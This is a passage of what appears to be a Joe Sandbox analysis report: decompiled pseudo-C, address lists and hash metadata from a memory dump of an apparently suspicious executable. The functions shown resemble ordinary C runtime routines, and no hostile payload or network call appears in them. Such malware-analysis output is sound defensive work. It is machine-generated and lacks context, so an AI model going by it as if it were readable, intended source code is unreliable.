                                                                                                                                      												L61:
                                                                                                                                      												_t104 = 0x30;
                                                                                                                                      												_t183 = 0;
                                                                                                                                      												__eflags = 0;
                                                                                                                                      												 *_t187 = _t151 + _t104;
                                                                                                                                      												 *(_t187 + 1) = 0;
                                                                                                                                      												goto L62;
                                                                                                                                      											}
                                                                                                                                      											__eflags = _t137;
                                                                                                                                      											if(__eflags < 0) {
                                                                                                                                      												goto L61;
                                                                                                                                      											}
                                                                                                                                      											if(__eflags > 0) {
                                                                                                                                      												goto L60;
                                                                                                                                      											}
                                                                                                                                      											__eflags = _t151 - 0xa;
                                                                                                                                      											if(_t151 < 0xa) {
                                                                                                                                      												goto L61;
                                                                                                                                      											}
                                                                                                                                      											goto L60;
                                                                                                                                      										}
                                                                                                                                      										if(__eflags > 0) {
                                                                                                                                      											L51:
                                                                                                                                      											_push(0);
                                                                                                                                      											_push(0x3e8);
                                                                                                                                      											_push(_t137);
                                                                                                                                      											_push(_t151);
                                                                                                                                      											_t107 = E01322A30();
                                                                                                                                      											_v32 = _t174;
                                                                                                                                      											 *_t187 = _t107 + 0x30;
                                                                                                                                      											_t187 = _t187 + 1;
                                                                                                                                      											__eflags = _t187 - _t182;
                                                                                                                                      											if(_t187 != _t182) {
                                                                                                                                      												L55:
                                                                                                                                      												_push(0);
                                                                                                                                      												_push(0x64);
                                                                                                                                      												_push(_t137);
                                                                                                                                      												_push(_t151);
                                                                                                                                      												_t109 = E01322A30();
                                                                                                                                      												_v32 = _t174;
                                                                                                                                      												 *_t187 = _t109 + 0x30;
                                                                                                                                      												_t187 = _t187 + 1;
                                                                                                                                      												__eflags = _t187;
                                                                                                                                      												goto L56;
                                                                                                                                      											}
                                                                                                                                      											L52:
                                                                                                                                      											__eflags = _t137;
                                                                                                                                      											if(__eflags < 0) {
                                                                                                                                      												goto L56;
                                                                                                                                      											}
                                                                                                                                      											if(__eflags > 0) {
                                                                                                                                      												goto L55;
                                                                                                                                      											}
                                                                                                                                      											__eflags = _t151 - 0x64;
                                                                                                                                      											if(_t151 < 0x64) {
                                                                                                                                      												goto L56;
                                                                                                                                      											}
                                                                                                                                      											goto L55;
                                                                                                                                      										}
                                                                                                                                      										__eflags = _t151 - 0x3e8;
                                                                                                                                      										if(_t151 < 0x3e8) {
                                                                                                                                      											goto L52;
                                                                                                                                      										}
                                                                                                                                      										goto L51;
                                                                                                                                      									}
                                                                                                                                      									__eflags = _t151;
                                                                                                                                      									if(_t151 < 0) {
                                                                                                                                      										goto L47;
                                                                                                                                      									}
                                                                                                                                      									goto L46;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							goto L23;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					__eflags = 0;
                                                                                                                                      					if(0 != 0) {
                                                                                                                                      						goto L11;
                                                                                                                                      					} else {
                                                                                                                                      						_t183 = E01315B30(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                                                                                                      						__eflags = _t183;
                                                                                                                                      						if(_t183 == 0) {
                                                                                                                                      							_t128 = E01322E40(_t184, 0x65);
                                                                                                                                      							_pop(_t166);
                                                                                                                                      							__eflags = _t128;
                                                                                                                                      							if(_t128 != 0) {
                                                                                                                                      								__eflags = _a28;
                                                                                                                                      								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                                                                                      								__eflags = _t170;
                                                                                                                                      								 *_t128 = _t170;
                                                                                                                                      								 *((char*)(_t128 + 3)) = 0;
                                                                                                                                      							}
                                                                                                                                      							_t183 = 0;
                                                                                                                                      						} else {
                                                                                                                                      							 *_t184 = 0;
                                                                                                                                      						}
                                                                                                                                      						goto L62;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t129 = E01313CD1();
                                                                                                                                      					_t183 = 0x22;
                                                                                                                                      					 *_t129 = _t183;
                                                                                                                                      					E013110B9();
                                                                                                                                      					L62:
                                                                                                                                      					if(_v40 != 0) {
                                                                                                                                      						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                                                                                                      					}
                                                                                                                                      					return _t183;
                                                                                                                                      				}
                                                                                                                                      			}
























































                                                                                                                                      0x0131582d
                                                                                                                                      0x01315838
                                                                                                                                      0x0131583f
                                                                                                                                      0x01315841
                                                                                                                                      0x01315841
                                                                                                                                      0x01315843
                                                                                                                                      0x0131584c
                                                                                                                                      0x0131584e
                                                                                                                                      0x01315853
                                                                                                                                      0x01315859
                                                                                                                                      0x0131586f
                                                                                                                                      0x01315874
                                                                                                                                      0x01315877
                                                                                                                                      0x01315884
                                                                                                                                      0x01315889
                                                                                                                                      0x013158dd
                                                                                                                                      0x013158e5
                                                                                                                                      0x013158e7
                                                                                                                                      0x013158e9
                                                                                                                                      0x013158ec
                                                                                                                                      0x013158ec
                                                                                                                                      0x013158ec
                                                                                                                                      0x013158f2
                                                                                                                                      0x013158fa
                                                                                                                                      0x0131590d
                                                                                                                                      0x01315910
                                                                                                                                      0x01315912
                                                                                                                                      0x01315915
                                                                                                                                      0x01315916
                                                                                                                                      0x01315937
                                                                                                                                      0x0131593a
                                                                                                                                      0x0131593a
                                                                                                                                      0x01315918
                                                                                                                                      0x01315918
                                                                                                                                      0x0131591a
                                                                                                                                      0x01315925
                                                                                                                                      0x01315925
                                                                                                                                      0x01315927
                                                                                                                                      0x0131592e
                                                                                                                                      0x01315929
                                                                                                                                      0x01315929
                                                                                                                                      0x01315929
                                                                                                                                      0x01315927
                                                                                                                                      0x0131593b
                                                                                                                                      0x0131593d
                                                                                                                                      0x0131593e
                                                                                                                                      0x01315941
                                                                                                                                      0x01315943
                                                                                                                                      0x01315957
                                                                                                                                      0x01315945
                                                                                                                                      0x01315945
                                                                                                                                      0x01315945
                                                                                                                                      0x0131595c
                                                                                                                                      0x0131595c
                                                                                                                                      0x01315961
                                                                                                                                      0x01315964
                                                                                                                                      0x0131596f
                                                                                                                                      0x0131596f
                                                                                                                                      0x0131596f
                                                                                                                                      0x0131596f
                                                                                                                                      0x01315973
                                                                                                                                      0x0131597a
                                                                                                                                      0x0131597b
                                                                                                                                      0x0131597e
                                                                                                                                      0x01315981
                                                                                                                                      0x01315981
                                                                                                                                      0x01315983
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131599b
                                                                                                                                      0x013159a2
                                                                                                                                      0x013159a6
                                                                                                                                      0x013159a9
                                                                                                                                      0x013159ac
                                                                                                                                      0x013159ae
                                                                                                                                      0x013159ae
                                                                                                                                      0x013159ae
                                                                                                                                      0x013159b0
                                                                                                                                      0x013159b3
                                                                                                                                      0x013159b6
                                                                                                                                      0x013159b8
                                                                                                                                      0x013159c0
                                                                                                                                      0x013159c6
                                                                                                                                      0x013159c9
                                                                                                                                      0x013159cc
                                                                                                                                      0x013159cd
                                                                                                                                      0x013159d0
                                                                                                                                      0x013159d3
                                                                                                                                      0x013159d3
                                                                                                                                      0x013159d8
                                                                                                                                      0x013159db
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013159f3
                                                                                                                                      0x013159f8
                                                                                                                                      0x013159fc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315a00
                                                                                                                                      0x01315a00
                                                                                                                                      0x01315a03
                                                                                                                                      0x01315a04
                                                                                                                                      0x01315a04
                                                                                                                                      0x01315a06
                                                                                                                                      0x01315a09
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315a0b
                                                                                                                                      0x01315a0e
                                                                                                                                      0x01315a15
                                                                                                                                      0x01315a18
                                                                                                                                      0x01315a1b
                                                                                                                                      0x01315a31
                                                                                                                                      0x01315a31
                                                                                                                                      0x01315a31
                                                                                                                                      0x01315a1d
                                                                                                                                      0x01315a1d
                                                                                                                                      0x01315a1f
                                                                                                                                      0x01315a22
                                                                                                                                      0x01315a2d
                                                                                                                                      0x01315a24
                                                                                                                                      0x01315a27
                                                                                                                                      0x01315a27
                                                                                                                                      0x01315a22
                                                                                                                                      0x00000000
                                                                                                                                      0x01315a1b
                                                                                                                                      0x01315a10
                                                                                                                                      0x01315a10
                                                                                                                                      0x01315a12
                                                                                                                                      0x01315a12
                                                                                                                                      0x01315966
                                                                                                                                      0x01315966
                                                                                                                                      0x01315969
                                                                                                                                      0x01315a34
                                                                                                                                      0x01315a34
                                                                                                                                      0x01315a36
                                                                                                                                      0x01315a38
                                                                                                                                      0x01315a3b
                                                                                                                                      0x01315a3c
                                                                                                                                      0x01315a3d
                                                                                                                                      0x01315a3e
                                                                                                                                      0x01315a46
                                                                                                                                      0x01315a46
                                                                                                                                      0x01315a46
                                                                                                                                      0x01315a48
                                                                                                                                      0x01315a4b
                                                                                                                                      0x01315a4e
                                                                                                                                      0x01315a50
                                                                                                                                      0x01315a50
                                                                                                                                      0x01315a52
                                                                                                                                      0x01315a64
                                                                                                                                      0x01315a68
                                                                                                                                      0x01315a6b
                                                                                                                                      0x01315a72
                                                                                                                                      0x01315a7a
                                                                                                                                      0x01315a7a
                                                                                                                                      0x01315a7d
                                                                                                                                      0x01315a7f
                                                                                                                                      0x01315a90
                                                                                                                                      0x01315a90
                                                                                                                                      0x01315a94
                                                                                                                                      0x01315a94
                                                                                                                                      0x01315a97
                                                                                                                                      0x01315a99
                                                                                                                                      0x01315a9c
                                                                                                                                      0x00000000
                                                                                                                                      0x01315a81
                                                                                                                                      0x01315a81
                                                                                                                                      0x01315a87
                                                                                                                                      0x01315a87
                                                                                                                                      0x01315a8b
                                                                                                                                      0x01315a9e
                                                                                                                                      0x01315a9e
                                                                                                                                      0x01315aa2
                                                                                                                                      0x01315aa3
                                                                                                                                      0x01315aa5
                                                                                                                                      0x01315aa7
                                                                                                                                      0x01315ae8
                                                                                                                                      0x01315ae8
                                                                                                                                      0x01315aea
                                                                                                                                      0x01315af7
                                                                                                                                      0x01315af7
                                                                                                                                      0x01315af9
                                                                                                                                      0x01315afb
                                                                                                                                      0x01315afc
                                                                                                                                      0x01315afd
                                                                                                                                      0x01315b04
                                                                                                                                      0x01315b07
                                                                                                                                      0x01315b09
                                                                                                                                      0x01315b09
                                                                                                                                      0x01315b0a
                                                                                                                                      0x01315b0c
                                                                                                                                      0x01315b0f
                                                                                                                                      0x01315b0f
                                                                                                                                      0x01315b11
                                                                                                                                      0x01315b13
                                                                                                                                      0x00000000
                                                                                                                                      0x01315b13
                                                                                                                                      0x01315aec
                                                                                                                                      0x01315aee
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315af0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315af2
                                                                                                                                      0x01315af5
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315af5
                                                                                                                                      0x01315aae
                                                                                                                                      0x01315ab4
                                                                                                                                      0x01315ab4
                                                                                                                                      0x01315ab6
                                                                                                                                      0x01315ab7
                                                                                                                                      0x01315ab8
                                                                                                                                      0x01315ab9
                                                                                                                                      0x01315ac0
                                                                                                                                      0x01315ac3
                                                                                                                                      0x01315ac5
                                                                                                                                      0x01315ac6
                                                                                                                                      0x01315ac8
                                                                                                                                      0x01315ad5
                                                                                                                                      0x01315ad5
                                                                                                                                      0x01315ad7
                                                                                                                                      0x01315ad9
                                                                                                                                      0x01315ada
                                                                                                                                      0x01315adb
                                                                                                                                      0x01315ae2
                                                                                                                                      0x01315ae5
                                                                                                                                      0x01315ae7
                                                                                                                                      0x01315ae7
                                                                                                                                      0x00000000
                                                                                                                                      0x01315ae7
                                                                                                                                      0x01315aca
                                                                                                                                      0x01315aca
                                                                                                                                      0x01315acc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315ace
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315ad0
                                                                                                                                      0x01315ad3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315ad3
                                                                                                                                      0x01315ab0
                                                                                                                                      0x01315ab2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315ab2
                                                                                                                                      0x01315a83
                                                                                                                                      0x01315a85
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01315a85
                                                                                                                                      0x01315a7f
                                                                                                                                      0x00000000
                                                                                                                                      0x01315969
                                                                                                                                      0x01315964
                                                                                                                                      0x0131588b
                                                                                                                                      0x0131588d
                                                                                                                                      0x00000000
                                                                                                                                      0x0131588f
                                                                                                                                      0x013158a5
                                                                                                                                      0x013158aa
                                                                                                                                      0x013158ac
                                                                                                                                      0x013158b8
                                                                                                                                      0x013158be
                                                                                                                                      0x013158bf
                                                                                                                                      0x013158c1
                                                                                                                                      0x013158c3
                                                                                                                                      0x013158ce
                                                                                                                                      0x013158ce
                                                                                                                                      0x013158d1
                                                                                                                                      0x013158d3
                                                                                                                                      0x013158d3
                                                                                                                                      0x013158d6
                                                                                                                                      0x013158ae
                                                                                                                                      0x013158ae
                                                                                                                                      0x013158ae
                                                                                                                                      0x00000000
                                                                                                                                      0x013158ac
                                                                                                                                      0x0131585b
                                                                                                                                      0x0131585b
                                                                                                                                      0x01315862
                                                                                                                                      0x01315863
                                                                                                                                      0x01315865
                                                                                                                                      0x01315b17
                                                                                                                                      0x01315b1b
                                                                                                                                      0x01315b20
                                                                                                                                      0x01315b20
                                                                                                                                      0x01315b2f
                                                                                                                                      0x01315b2f

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                      • Opcode ID: c36ddf125a663d19eeb724ba5fb486a3f365b4388f911109af30322a79cf4460
                                                                                                                                      • Instruction ID: f07f8cd394b540fbf7c4df7472286632654f3f6930482a48c0756a995c88f6e2
                                                                                                                                      • Opcode Fuzzy Hash: c36ddf125a663d19eeb724ba5fb486a3f365b4388f911109af30322a79cf4460
                                                                                                                                      • Instruction Fuzzy Hash: A1A16A72A403869FE71ACF1CC8D0BAEBFE5EFA7318F18416DD9959B245C2348941CB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                      			E013201B1(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                                                      				int _v8;
                                                                                                                                      				intOrPtr _v12;
                                                                                                                                      				signed int _v16;
                                                                                                                                      				signed int _v20;
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				signed int _t16;
                                                                                                                                      				signed int _t17;
                                                                                                                                      				int _t20;
                                                                                                                                      				signed int _t21;
                                                                                                                                      				int _t23;
                                                                                                                                      				signed int _t25;
                                                                                                                                      				int _t28;
                                                                                                                                      				intOrPtr* _t30;
                                                                                                                                      				int _t34;
                                                                                                                                      				int _t35;
                                                                                                                                      				void* _t36;
                                                                                                                                      				intOrPtr* _t37;
                                                                                                                                      				intOrPtr* _t38;
                                                                                                                                      				int _t46;
                                                                                                                                      				void* _t54;
                                                                                                                                      				void* _t56;
                                                                                                                                      				signed int _t58;
                                                                                                                                      				int _t61;
                                                                                                                                      				int _t63;
                                                                                                                                      				void* _t64;
                                                                                                                                      				void* _t65;
                                                                                                                                      				void* _t66;
                                                                                                                                      
                                                                                                                                      				_t58 = __edx;
                                                                                                                                      				_t59 = _a4;
                                                                                                                                      				_t61 = 0;
                                                                                                                                      				_t16 = E0131FBCF(_a4, 0, 0, 1);
                                                                                                                                      				_v20 = _t16;
                                                                                                                                      				_v16 = __edx;
                                                                                                                                      				_t65 = _t64 + 0x10;
                                                                                                                                      				if((_t16 & __edx) != 0xffffffff) {
                                                                                                                                      					_t17 = E0131FBCF(_t59, 0, 0, 2);
                                                                                                                                      					_t66 = _t65 + 0x10;
                                                                                                                                      					_t51 = _t17 & __edx;
                                                                                                                                      					__eflags = (_t17 & __edx) - 0xffffffff;
                                                                                                                                      					if((_t17 & __edx) == 0xffffffff) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					_t46 = _a8 - _t17;
                                                                                                                                      					__eflags = _t46;
                                                                                                                                      					_t20 = _a12;
                                                                                                                                      					asm("sbb eax, edx");
                                                                                                                                      					_v8 = _t20;
                                                                                                                                      					if(__eflags < 0) {
                                                                                                                                      						L24:
                                                                                                                                      						__eflags = _t20 - _t61;
                                                                                                                                      						if(__eflags > 0) {
                                                                                                                                      							L19:
                                                                                                                                      							_t21 = E0131FBCF(_t59, _v20, _v16, _t61);
                                                                                                                                      							__eflags = (_t21 & _t58) - 0xffffffff;
                                                                                                                                      							if((_t21 & _t58) != 0xffffffff) {
                                                                                                                                      								_t23 = 0;
                                                                                                                                      								__eflags = 0;
                                                                                                                                      								L31:
                                                                                                                                      								return _t23;
                                                                                                                                      							}
                                                                                                                                      							L20:
                                                                                                                                      							_t23 =  *((intOrPtr*)(E01313CD1()));
                                                                                                                                      							goto L31;
                                                                                                                                      						}
                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                      							L27:
                                                                                                                                      							_t25 = E0131FBCF(_t59, _a8, _a12, _t61);
                                                                                                                                      							_t66 = _t66 + 0x10;
                                                                                                                                      							__eflags = (_t25 & _t58) - 0xffffffff;
                                                                                                                                      							if((_t25 & _t58) == 0xffffffff) {
                                                                                                                                      								goto L20;
                                                                                                                                      							}
                                                                                                                                      							_t28 = SetEndOfFile(E0131A96A(_t59));
                                                                                                                                      							__eflags = _t28;
                                                                                                                                      							if(_t28 != 0) {
                                                                                                                                      								goto L19;
                                                                                                                                      							}
                                                                                                                                      							 *((intOrPtr*)(E01313CD1())) = 0xd;
                                                                                                                                      							_t30 = E01313CBE();
                                                                                                                                      							 *_t30 = GetLastError();
                                                                                                                                      							goto L20;
                                                                                                                                      						}
                                                                                                                                      						__eflags = _t46 - _t61;
                                                                                                                                      						if(_t46 >= _t61) {
                                                                                                                                      							goto L19;
                                                                                                                                      						}
                                                                                                                                      						goto L27;
                                                                                                                                      					}
                                                                                                                                      					if(__eflags > 0) {
                                                                                                                                      						L6:
                                                                                                                                      						_t63 = E013145B8(_t51, 0x1000, 1);
                                                                                                                                      						_pop(_t54);
                                                                                                                                      						__eflags = _t63;
                                                                                                                                      						if(_t63 != 0) {
                                                                                                                                      							_v12 = E013137DD(_t54, _t59, 0x8000);
                                                                                                                                      							_t34 = _v8;
                                                                                                                                      							_pop(_t56);
                                                                                                                                      							do {
                                                                                                                                      								__eflags = _t34;
                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                      									L13:
                                                                                                                                      									_t35 = _t46;
                                                                                                                                      									L14:
                                                                                                                                      									_t36 = E0131BF02(_t46, _t59, _t63, _t59, _t63, _t35);
                                                                                                                                      									_t66 = _t66 + 0xc;
                                                                                                                                      									__eflags = _t36 - 0xffffffff;
                                                                                                                                      									if(_t36 == 0xffffffff) {
                                                                                                                                      										_t37 = E01313CBE();
                                                                                                                                      										__eflags =  *_t37 - 5;
                                                                                                                                      										if( *_t37 == 5) {
                                                                                                                                      											 *((intOrPtr*)(E01313CD1())) = 0xd;
                                                                                                                                      										}
                                                                                                                                      										L23:
                                                                                                                                      										_t38 = E01313CD1();
                                                                                                                                      										E01314615(_t63);
                                                                                                                                      										_t23 =  *_t38;
                                                                                                                                      										goto L31;
                                                                                                                                      									}
                                                                                                                                      									asm("cdq");
                                                                                                                                      									_t46 = _t46 - _t36;
                                                                                                                                      									_t34 = _v8;
                                                                                                                                      									asm("sbb eax, edx");
                                                                                                                                      									_v8 = _t34;
                                                                                                                                      									__eflags = _t34;
                                                                                                                                      									if(__eflags > 0) {
                                                                                                                                      										L12:
                                                                                                                                      										_t35 = 0x1000;
                                                                                                                                      										goto L14;
                                                                                                                                      									}
                                                                                                                                      									if(__eflags < 0) {
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									goto L17;
                                                                                                                                      								}
                                                                                                                                      								if(__eflags > 0) {
                                                                                                                                      									goto L12;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _t46 - 0x1000;
                                                                                                                                      								if(_t46 < 0x1000) {
                                                                                                                                      									goto L13;
                                                                                                                                      								}
                                                                                                                                      								goto L12;
                                                                                                                                      								L17:
                                                                                                                                      								__eflags = _t46;
                                                                                                                                      							} while (_t46 != 0);
                                                                                                                                      							E013137DD(_t56, _t59, _v12);
                                                                                                                                      							E01314615(_t63);
                                                                                                                                      							_t66 = _t66 + 0xc;
                                                                                                                                      							_t61 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							goto L19;
                                                                                                                                      						}
                                                                                                                                      						 *((intOrPtr*)(E01313CD1())) = 0xc;
                                                                                                                                      						goto L23;
                                                                                                                                      					}
                                                                                                                                      					__eflags = _t46;
                                                                                                                                      					if(_t46 <= 0) {
                                                                                                                                      						goto L24;
                                                                                                                                      					}
                                                                                                                                      					goto L6;
                                                                                                                                      				}
                                                                                                                                      				L1:
                                                                                                                                      				return  *((intOrPtr*)(E01313CD1()));
                                                                                                                                      			}
































                                                                                                                                      0x013201b1
                                                                                                                                      0x013201bb
                                                                                                                                      0x013201be
                                                                                                                                      0x013201c5
                                                                                                                                      0x013201cc
                                                                                                                                      0x013201d1
                                                                                                                                      0x013201d4
                                                                                                                                      0x013201da
                                                                                                                                      0x013201ed
                                                                                                                                      0x013201f4
                                                                                                                                      0x013201f7
                                                                                                                                      0x013201f9
                                                                                                                                      0x013201fc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320202
                                                                                                                                      0x01320202
                                                                                                                                      0x01320204
                                                                                                                                      0x01320207
                                                                                                                                      0x01320209
                                                                                                                                      0x0132020c
                                                                                                                                      0x013202ea
                                                                                                                                      0x013202ea
                                                                                                                                      0x013202ec
                                                                                                                                      0x013202a3
                                                                                                                                      0x013202ab
                                                                                                                                      0x013202b5
                                                                                                                                      0x013202b8
                                                                                                                                      0x01320339
                                                                                                                                      0x01320339
                                                                                                                                      0x0132033b
                                                                                                                                      0x00000000
                                                                                                                                      0x0132033b
                                                                                                                                      0x013202ba
                                                                                                                                      0x013202bf
                                                                                                                                      0x00000000
                                                                                                                                      0x013202bf
                                                                                                                                      0x013202ee
                                                                                                                                      0x013202f4
                                                                                                                                      0x013202fc
                                                                                                                                      0x01320303
                                                                                                                                      0x01320306
                                                                                                                                      0x01320309
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320313
                                                                                                                                      0x01320319
                                                                                                                                      0x0132031b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320322
                                                                                                                                      0x01320328
                                                                                                                                      0x01320335
                                                                                                                                      0x00000000
                                                                                                                                      0x01320335
                                                                                                                                      0x013202f0
                                                                                                                                      0x013202f2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013202f2
                                                                                                                                      0x01320212
                                                                                                                                      0x0132021c
                                                                                                                                      0x01320228
                                                                                                                                      0x0132022b
                                                                                                                                      0x0132022c
                                                                                                                                      0x0132022e
                                                                                                                                      0x0132024c
                                                                                                                                      0x0132024f
                                                                                                                                      0x01320252
                                                                                                                                      0x01320253
                                                                                                                                      0x01320253
                                                                                                                                      0x01320255
                                                                                                                                      0x01320268
                                                                                                                                      0x01320268
                                                                                                                                      0x0132026a
                                                                                                                                      0x0132026d
                                                                                                                                      0x01320272
                                                                                                                                      0x01320275
                                                                                                                                      0x01320278
                                                                                                                                      0x013202c3
                                                                                                                                      0x013202c8
                                                                                                                                      0x013202cb
                                                                                                                                      0x013202d2
                                                                                                                                      0x013202d2
                                                                                                                                      0x013202d8
                                                                                                                                      0x013202d8
                                                                                                                                      0x013202e0
                                                                                                                                      0x013202e6
                                                                                                                                      0x00000000
                                                                                                                                      0x013202e6
                                                                                                                                      0x0132027a
                                                                                                                                      0x0132027b
                                                                                                                                      0x0132027d
                                                                                                                                      0x01320280
                                                                                                                                      0x01320282
                                                                                                                                      0x01320285
                                                                                                                                      0x01320287
                                                                                                                                      0x01320261
                                                                                                                                      0x01320261
                                                                                                                                      0x00000000
                                                                                                                                      0x01320261
                                                                                                                                      0x01320289
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320289
                                                                                                                                      0x01320257
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320259
                                                                                                                                      0x0132025f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0132028b
                                                                                                                                      0x0132028b
                                                                                                                                      0x0132028b
                                                                                                                                      0x01320293
                                                                                                                                      0x01320299
                                                                                                                                      0x0132029e
                                                                                                                                      0x013202a1
                                                                                                                                      0x013202a1
                                                                                                                                      0x00000000
                                                                                                                                      0x013202a1
                                                                                                                                      0x01320235
                                                                                                                                      0x00000000
                                                                                                                                      0x01320235
                                                                                                                                      0x01320214
                                                                                                                                      0x01320216
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320216
                                                                                                                                      0x013201dc
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                      • Opcode ID: 608f69e443528f0419ece8c9be39a49ab0e5e2c77c518b205ba81e25e6b3aab3
                                                                                                                                      • Instruction ID: 5574c5bd93dd1519553f20bb1419f8826c529f119bb144e2988a6f93cc7f22e4
                                                                                                                                      • Opcode Fuzzy Hash: 608f69e443528f0419ece8c9be39a49ab0e5e2c77c518b205ba81e25e6b3aab3
                                                                                                                                      • Instruction Fuzzy Hash: 36418E31A00325ABDB2D7BBD8C80A7F3AA8FF5777CF140216F518E7594D634484947A1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                      			E013181E2(void* _a4, intOrPtr* _a8) {
                                                                                                                                      				char _v5;
                                                                                                                                      				intOrPtr _v12;
                                                                                                                                      				char _v16;
                                                                                                                                      				signed int _t44;
                                                                                                                                      				char _t47;
                                                                                                                                      				intOrPtr _t50;
                                                                                                                                      				signed int _t52;
                                                                                                                                      				signed int _t56;
                                                                                                                                      				signed int _t57;
                                                                                                                                      				void* _t59;
                                                                                                                                      				signed int _t63;
                                                                                                                                      				signed int _t65;
                                                                                                                                      				char _t67;
                                                                                                                                      				intOrPtr* _t68;
                                                                                                                                      				intOrPtr* _t69;
                                                                                                                                      				intOrPtr* _t71;
                                                                                                                                      				intOrPtr _t75;
                                                                                                                                      				void* _t76;
                                                                                                                                      				void* _t77;
                                                                                                                                      				signed int _t80;
                                                                                                                                      				intOrPtr _t82;
                                                                                                                                      				void* _t86;
                                                                                                                                      				signed int _t87;
                                                                                                                                      				void* _t89;
                                                                                                                                      				signed int _t91;
                                                                                                                                      				intOrPtr* _t98;
                                                                                                                                      				void* _t101;
                                                                                                                                      				intOrPtr _t102;
                                                                                                                                      				intOrPtr _t103;
                                                                                                                                      
                                                                                                                                      				_t101 = _a4;
                                                                                                                                      				if(_t101 != 0) {
                                                                                                                                      					_t80 = 9;
                                                                                                                                      					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                                                                                                                                      					_t98 = _a8;
                                                                                                                                      					__eflags = _t98;
                                                                                                                                      					if(_t98 != 0) {
                                                                                                                                      						_t82 =  *((intOrPtr*)(_t98 + 4));
                                                                                                                                      						_t47 =  *_t98;
                                                                                                                                      						_v16 = _t47;
                                                                                                                                      						_v12 = _t82;
                                                                                                                                      						__eflags = _t82 - 0xffffffff;
                                                                                                                                      						if(__eflags > 0) {
                                                                                                                                      							L7:
                                                                                                                                      							_t89 = 7;
